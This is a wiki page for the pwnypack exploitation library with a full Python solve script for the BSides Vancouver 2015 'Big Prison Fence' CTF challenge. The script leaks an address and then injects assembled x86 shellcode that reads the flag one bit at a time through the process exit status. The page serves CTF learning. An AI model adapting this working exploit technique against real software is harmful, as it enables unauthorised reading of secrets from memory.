-
Notifications
You must be signed in to change notification settings - Fork 28
Big Prison Fence
Ingmar Steen edited this page Mar 21, 2015
·
8 revisions
This example demonstrates how to use pwnypack to capture the flag of the Vancouver BSides CTF 2015 'Big Prison Fence' challenge.
#! /usr/bin/env python
from __future__ import print_function
from pwny import *
target.arch = Architecture.x86
def leak_byte(offset):
v = 0
for bit in range(8):
while True:
f = Flow.execute('./bigpf')
# f = Flow.connect_tcp('bigprisonfence.termsec.net', 49782)
f.until(b'NAME PROGRAM\n')
f.writeline(b'A' * 32)
line = f.readline().strip()
if len(line) != 45:
# address contained a nul byte, retry.
f.kill()
continue
flag_addr = U(line[-4:])
program = asm('''
mov eax, %d
mov ebx, 0
test byte [eax], %d
sete bl
mov eax, 1
int 0x80
''' % (flag_addr + offset, 1 << bit))
f.until(b'LOAD PROGRAM\n')
f.write(P32(len(program)) + program, echo=False)
try:
f.until(b'THANK YOU\n')
v |= 1 << bit
except EOFError:
pass
f.close()
break
return chr(v)
flag = c = ''
o = len(flag)
while c != '\0':
flag += c
c = leak_byte(o)
o += 1
print('Here is the flag:', flag)